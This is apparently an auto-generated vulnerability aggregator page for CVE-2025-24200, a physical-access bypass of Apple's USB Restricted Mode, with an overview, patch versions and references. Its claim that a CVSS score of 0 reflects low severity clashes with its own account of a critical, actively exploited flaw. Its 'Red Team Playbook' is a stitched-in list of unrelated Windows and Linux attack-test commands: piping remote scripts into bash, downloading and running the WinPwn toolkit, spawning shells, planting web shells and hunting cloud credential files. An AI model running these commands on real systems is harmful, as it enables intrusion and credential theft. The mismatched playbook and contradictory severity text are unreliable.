CVE-2025-24200
Overview
This vulnerability is an authorization bypass caused by improper state management within Apple iOS and iPadOS. The flaw affects the USB Restricted Mode feature on locked devices, allowing physical manipulation to disable its protections. The root cause lies in insufficient enforcement of authorization checks controlling USB access state transitions under locked conditions.
Vulnerability Description
An authorization issue was addressed with improved state management. This issue is fixed in iOS 15.8.4 and iPadOS 15.8.4, iOS 16.7.11 and iPadOS 16.7.11, iOS 18.3.1 and iPadOS 18.3.1, iPadOS 17.7.5. A physical attack may disable USB Restricted Mode on a locked device. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals.
Impact
An attacker with physical access to a locked Apple device can disable USB Restricted Mode, enabling unauthorized USB data access or device interaction without unlocking the device. This bypass requires physical proximity but no user authentication or network access. The consequence includes potential data extraction or device compromise in highly targeted scenarios. The CVSS score of 0 reflects the low severity due to the physical access prerequisite and limited attack surface.
Solution
Apple has released patches addressing this authorization issue in iOS versions 15.8.4, 16.7.11, 18.3.1 and corresponding iPadOS versions up to 17.7.5. Users should update their devices to these versions or later to mitigate the vulnerability. Detailed patch information and update instructions are available in Apple security advisories at https://support.apple.com/en-us/122173, https://support.apple.com/en-us/122174, and https://support.apple.com/en-us/122345.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question revolves around an authorization issue that was addressed through improved state management in specific versions of iOS and iPadOS. This flaw primarily affects the handling of USB Restricted Mode, which is designed to limit access to data on a locked device. When USB Restricted Mode is disabled due to a physical attack, unauthorized access to sensitive information becomes possible, compromising the integrity and confidentiality of user data. The flaw highlights a critical weakness in the device's security architecture, particularly in scenarios where physical access to the device is gained by an attacker.
Attack vectors for this vulnerability are notably sophisticated, as they require physical access to the device. This could involve scenarios where an attacker utilizes advanced techniques to bypass security measures, such as exploiting the USB interface to extract data or manipulate device settings. The potential for exploitation is particularly concerning for high-profile individuals or organizations that may be targeted by state-sponsored actors or advanced persistent threats. The report of exploitation against specific targeted individuals underscores the severity of the threat, indicating that the vulnerability is not merely theoretical but has been actively leveraged in the wild.
The real-world impact of this vulnerability is significant, especially for businesses and individuals who handle sensitive information. The unauthorized access to data can lead to data breaches, loss of intellectual property, and reputational damage. For organizations, the financial implications can be severe, including regulatory fines, loss of customer trust, and the costs associated with incident response and recovery. Additionally, the potential for espionage or data theft poses a strategic risk, particularly for entities involved in government, defense, or critical infrastructure sectors.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular updates and patches to the affected operating systems are crucial, as they contain fixes that address the underlying authorization issues. Additionally, organizations should enforce strict physical security measures to prevent unauthorized access to devices, including security protocols for handling devices in sensitive environments. Monitoring for unusual USB activity and implementing endpoint detection and response solutions can further enhance security posture.
In conclusion, the vulnerability related to USB Restricted Mode presents a multifaceted threat landscape that requires vigilant attention from both individuals and organizations. The combination of sophisticated attack vectors, potential for real-world exploitation, and significant business risks necessitates a proactive approach to security. By prioritizing timely updates, enhancing physical security, and employing robust detection mechanisms, stakeholders can mitigate the risks associated with this vulnerability and safeguard sensitive information against unauthorized access.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
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Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
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Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
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Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
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Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
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Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
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Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
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Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
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Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-24200 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/122173 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/122174 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/122345 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/122346 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2025/Apr/7 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2025/Feb/7 |
| seclists.org |
NVD API
Mailing List
Third Party Advisory
|
http://seclists.org/fulldisclosure/2025/Feb/8 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24200 |